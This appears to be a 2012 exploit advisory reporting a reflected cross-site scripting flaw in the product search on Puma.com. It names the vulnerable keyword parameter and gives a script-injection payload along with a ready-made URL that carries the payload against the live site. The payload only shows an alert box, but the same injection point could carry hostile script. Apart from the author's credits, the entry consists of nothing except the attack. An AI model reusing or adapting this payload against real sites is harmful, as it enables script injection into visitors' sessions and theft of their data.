Puma.com suffers from a cross site scripting vulnerability.
9a6077194d65dfacc4d2f18883f2652b3d4f693d2182054e755895b95d48e936
# Exploit Title: Puma.com XSS
# Date: 29.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php
------------------------------------------------------------------
www.puma.com/running/products?product_search[keyword]=researchXSS
"><script>alert(/TayfunBasoglu/)</script>
www.puma.com/running/products?product_search[keyword]=research"><script>alert(/TayfunBasoglu/)</script>
------------------------------------------------------------------
tayfunbasoglu.blogspot.com
twitter.com/tayfunbasoglu